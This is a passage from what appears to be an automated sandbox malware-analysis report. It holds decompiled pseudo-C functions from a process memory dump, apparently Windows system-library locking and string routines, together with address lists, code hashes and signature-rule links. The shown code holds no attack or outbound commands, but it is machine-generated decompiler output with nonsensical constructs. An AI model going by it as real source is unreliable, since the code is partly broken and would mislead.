										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E03674888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0360EB70(_t95, 0x36e79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E036395D0();
											L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E036395D0();
											L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0360EB70(_t93, 0x36e79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E036395D0();
										L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E036395D0();
										L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0362F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x035f52a5
0x035f52ad
0x035f52b0
0x035f52b3
0x035f52b7
0x035f52ba
0x035f52bf
0x035f52c4
0x035f52cc
0x00000000
0x00000000
0x035f52ce
0x035f52d9
0x035f52dd
0x035f52e7
0x035f52f7
0x035f52f9
0x035f52fd
0x03650dcf
0x03650dd5
0x03650dd6
0x03650dd7
0x03650dd8
0x03650dd9
0x03650dde
0x03650ddf
0x03650de0
0x03650de1
0x03650de2
0x03650de5
0x03650dea
0x03650dec
0x03650f60
0x03650f64
0x03650f70
0x03650f76
0x03650f79
0x03650f79
0x00000000
0x03650f64
0x03650df2
0x03650df7
0x03650e04
0x03650e0d
0x03650e0d
0x03650e10
0x03650e1a
0x03650e1c
0x03650e4c
0x03650e52
0x03650e61
0x03650e67
0x03650e6b
0x03650e70
0x03650e76
0x03650ed7
0x03650edc
0x03650ee0
0x03650ee6
0x03650eea
0x03650eed
0x03650ef0
0x03650ef3
0x03650ef6
0x03650ef9
0x03650efe
0x03650f01
0x03650f01
0x03650f0b
0x03650f12
0x03650f16
0x03650f18
0x03650f1b
0x03650f2c
0x03650f31
0x03650f31
0x03650f35
0x03650f39
0x03650f3a
0x03650f3c
0x03650f3f
0x03650f50
0x03650f55
0x03650f55
0x03650f59
0x035f52eb
0x035f52f1
0x035f52f1
0x03650e7d
0x03650e84
0x03650e88
0x03650e8a
0x03650e8d
0x03650e9e
0x03650ea3
0x03650ea3
0x03650ea7
0x03650eaf
0x03650eb3
0x03650eb9
0x03650eb9
0x03650ebc
0x03650ecd
0x03650ecd
0x00000000
0x03650eb3
0x03650e21
0x03650e2b
0x03650e2f
0x03650e30
0x03650e3a
0x03650e3f
0x03650e41
0x00000000
0x00000000
0x03650e47
0x00000000
0x03650e47
0x03650df9
0x03650dfe
0x00000000
0x00000000
0x00000000
0x03650dfe
0x035f5303
0x035f5307
0x00000000
0x035f5309
0x00000000
0x035f5309
0x035f5307
0x035f52e9
0x035f52e9
0x00000000
0x035f52e9
0x035f530e
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e710475af54fbddb7418461db01386aff983d347f9f89aec6f3ab5694e6398
Instruction ID: 7be0adab304aea66a3c52ac77d24db9f9855153d81b6d204a35c14c835311b7b
Opcode Fuzzy Hash: d1e710475af54fbddb7418461db01386aff983d347f9f89aec6f3ab5694e6398
Instruction Fuzzy Hash: F151BA35205741AFC321EF28C941B2BBBE8BF41710F180D2EE8958B661E770E844CB96

Uniqueness

Uniqueness Score: -1.00%

Function 03622AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03622AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x36e8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x36e8208; // 0x36e8207
				_t8 = _t57 + 0x36e8208; // 0x36e8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x36e8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x36e821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x36e6d5c; // 0x7f210654
							_t72 =  *0x36e6d5c; // 0x7f210654
							_t75 =  *0x36e6d5c; // 0x7f210654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x36e6d5c; // 0x7f210654
							_t84 =  *0x36e6d5c; // 0x7f210654
							_t87 =  *0x36e6d5c; // 0x7f210654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0363F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x03622ae4
0x03622aec
0x03622aef
0x03622af4
0x03622af7
0x03622afd
0x03622b92
0x03622b92
0x03622b97
0x03622b9c
0x03622b9c
0x03622b03
0x03622b06
0x03622b09
0x03622b09
0x03622b0f
0x03622b15
0x03622b15
0x03622b1b
0x03622b1e
0x03622b21
0x03622b26
0x03622b29
0x03622b81
0x03622b84
0x03622c0e
0x03622c15
0x03622c24
0x03622c24
0x03622b8a
0x03622b8a
0x03622b8a
0x03622b8a
0x03622b90
0x00000000
0x00000000
0x00000000
0x00000000
0x03622b4a
0x03622b4a
0x03622b4d
0x03622b53
0x00000000
0x00000000
0x03622b55
0x03622b58
0x03622bb7
0x03665d1b
0x03665d37
0x03665d47
0x03665d53
0x03622bbd
0x03622bbd
0x03622bbd
0x03622bb7
0x03622b5d
0x03622c2f
0x03665d5b
0x03665d77
0x03665d87
0x03665d93
0x03622c35
0x03622c35
0x03622c35
0x03622c2f
0x03622b65
0x03622b9f
0x03622ba2
0x03622b67
0x03622b67
0x03622b69
0x03622b6b
0x03622b6e
0x03622bc9
0x03622bcc
0x03622bcf
0x03622bd4
0x03622bd6
0x03622bd6
0x03622bdb
0x03622c02
0x03622c05
0x03622c07
0x00000000
0x03622c07
0x03622be0
0x03622c00
0x03622c3f
0x03622c3f
0x00000000
0x03622c00
0x03622be5
0x03622be7
0x03622bec
0x03622bf4
0x03622bf6
0x00000000
0x03622bf6
0x03622b70
0x03622b76
0x03622b2b
0x03622b2b
0x03622b2d
0x03622b2f
0x03622b32
0x03622b35
0x03622b3a
0x00000000
0x03622b40
0x03622b43
0x03622b45
0x03622b47
0x03622b4a
0x03622b4d
0x03622b53
0x00000000
0x00000000
0x00000000
0x03622b53
0x03622b78
0x03622b78
0x03622b7b
0x03622b7e
0x00000000
0x03622b7e
0x03622b76
0x03622ba5
0x03622ba5
0x03622ba8
0x03622bad
0x00000000
0x00000000
0x03622baf
0x03622baf
0x03622bc2
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2b09d779460ed1eef514e2907d9c892ca2e7f4bb14ae43dc0be8d333058687
Instruction ID: 3f7049423d8d0c83138994290a1e92b4c232ee59d3b1f69ccbd7f73eacf876cb
Opcode Fuzzy Hash: 6a2b09d779460ed1eef514e2907d9c892ca2e7f4bb14ae43dc0be8d333058687
Instruction Fuzzy Hash: B851C076F00525CFCB54CF1CC8A09BEBBB1FB98705706895AE846AB354D730AA55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 036BAE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E036BAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E036BC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E036BACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E036BFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E036BEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03617D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E036B1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E036C1536(0x36e8ae4, (_t74 -  *0x36e8b04 >> 0x14) + (_t74 -  *0x36e8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L036BC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E036BA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0369CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E036BACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x036bae44
0x036bae4c
0x036bae53
0x036bae55
0x036bae5c
0x036bae64
0x036bae68
0x036bae75
0x036bae75
0x036bae78
0x036bae7a
0x036bae7c
0x036bae7f
0x036baea8
0x036baeab
0x036baead
0x00000000
0x00000000
0x036baeb3
0x036baeb8
0x036baebb
0x036baebd
0x00000000
0x036bae81
0x036bae88
0x036bae8f
0x036bae9b
0x036bae96
0x036bae96
0x036bae96
0x036baea0
0x036baea3
0x036baebf
0x036baebf
0x036baec3
0x036baec9
0x036baf0d
0x036baf14
0x036baf3d
0x036baf3d
0x036baf41
0x036baf44
0x036baf67
0x036baf67
0x036baf6a
0x036bafca
0x036bafd1
0x00000000
0x036bafd1
0x036baf6c
0x036baf6d
0x036baf75
0x036baf7c
0x036baf7e
0x036baf80
0x036baf85
0x036baf87
0x036baf99
0x036baf89
0x036baf92
0x036baf92
0x036baf9e
0x036bafa1
0x036bafa3
0x036bafa9
0x036bafb0
0x036bafb2
0x036bafb4
0x036bafbc
0x036bafbc
0x036bafb4
0x036bafb0
0x00000000
0x036bafa1
0x036baf4f
0x036baf57
0x036baf5c
0x036baf5e
0x00000000
0x00000000
0x036baf60
0x036baf64
0x036baf64
0x00000000
0x036baf64
0x036baf1a
0x036baf25
0x00000000
0x00000000
0x036baf27
0x036baf28
0x036baf33
0x00000000
0x036baed0
0x036baed0
0x036baed2
0x036baee1
0x036baee4
0x00000000
0x00000000
0x036baee6
0x036baeec
0x00000000
0x00000000
0x036baefb
0x036baf07
0x036bafd3
0x036bafdb
0x036bafdb
0x00000000
0x036baf07
0x036baed6
0x036baed8
0x036baedf
0x00000000
0x00000000
0x00000000
0x036baedf
0x036baec9

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae536541c18ec24d2d0dd5831b48830bcb134434ad660efa1722acd2e5ad59fd
Instruction ID: 7010b1423a661793f8f7f22162c37295643bcf8c3631d61d9ee3c56fb0b31957
Opcode Fuzzy Hash: ae536541c18ec24d2d0dd5831b48830bcb134434ad660efa1722acd2e5ad59fd
Instruction Fuzzy Hash: BD41B3717002119BC726DA69C994BFBB7BDAF84610F08421DF8568B390D734D882DB91

Uniqueness

Uniqueness Score: -1.00%

Function 0361DBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0361DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E035FCC50(E035F4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03617D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E036C8ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03612280(_t58, _v44);
						E0361DD82(_v44, _t102, _t98);
						E0361B944(_t102, _v5);
						return E0360FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x36e8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x36e862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x36e8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x36e862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x36bfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x0361dbe9
0x0361dbf2
0x0361dbf7
0x0361dbf9
0x0361dbfc
0x0361dc00
0x0361dc03
0x0361dc14
0x0361dd54
0x0361dd54
0x0361dd54
0x0361dc18
0x0361dc1d
0x0361dc1d
0x0361dc32
0x0361dc3b
0x0361dc3e
0x0361dc46
0x0361dd5b
0x0361dd62
0x0361dd64
0x0361dd67
0x0361dd69
0x0361dd6b
0x0361dd6e
0x0361dd70
0x0361dd73
0x0361dd73
0x00000000
0x0361dc4c
0x0361dc4e
0x03663ae3
0x03663ae8
0x03663aea
0x0361dce7
0x0361dce9
0x0361dcec
0x0361dcee
0x0361dcf0
0x0361dcf3
0x0361dcf5
0x03663af2
0x03663af5
0x03663af5
0x0361dd06
0x0361dd08
0x0361dd0b
0x0361dd12
0x03663b08
0x0361dd18
0x0361dd18
0x0361dd18
0x0361dd20
0x0361dd23
0x03663b16
0x03663b16
0x0361dd29
0x0361dd2d
0x0361dd36
0x0361dd40
0x0361dd51
0x0361dd51
0x0361dc54
0x0361dc59
0x0361dc59
0x0361dc5e
0x0361dc5e
0x0361dc63
0x0361dc66
0x0361dc6b
0x0361dc78
0x0361dc7b
0x0361dc81
0x0361dc81
0x0361dc83
0x0361dc89
0x00000000
0x00000000
0x0361dd7b
0x0361dd7b
0x0361dc8f
0x0361dc8f
0x0361dc92
0x0361dc99
0x0361dc9f
0x0361dca5
0x0361dcaa
0x0361dcaa
0x0361dcb3
0x0361dcb8
0x0361dcbb
0x0361dcc1
0x0361dccf
0x0361dcd2
0x0361dcd5
0x0361dcd7
0x0361dcda
0x0361dcdc
0x0361dcdc
0x0361dce2
0x0361dce4
0x00000000
0x0361dce4

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6352deed2ec2fadf65cfbe8db9850a8bd0c1742d869213f947bcd220e8b181ac
Instruction ID: 4829abb02b9823c46f3dd91782ac19b69d91eece9c9de4f85361b31f2c709212
Opcode Fuzzy Hash: 6352deed2ec2fadf65cfbe8db9850a8bd0c1742d869213f947bcd220e8b181ac
Instruction Fuzzy Hash: D451CE75E00205CFCB14DFA8C580AAEFBF9FF89350F28859AD955AB344DB70A954CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0360EF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0360EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E035F9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E035F2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x0360ef4b
0x0360ef4d
0x0360ef57
0x0360f0bd
0x0360f0c2
0x0360f0d2
0x0360f0d2
0x0360f0c2
0x0360ef5d
0x0360ef5f
0x0360ef67
0x0360ef6a
0x0360ef6d
0x0360ef74
0x0360ef7f
0x0360ef82
0x0360ef82
0x0360ef86
0x0360ef88
0x0360ef8c
0x0360ef8f
0x0360ef8f
0x0360ef8f
0x00000000
0x0360ef91
0x0360ef93
0x0360efc4
0x0360efc4
0x0360efc4
0x0360efca
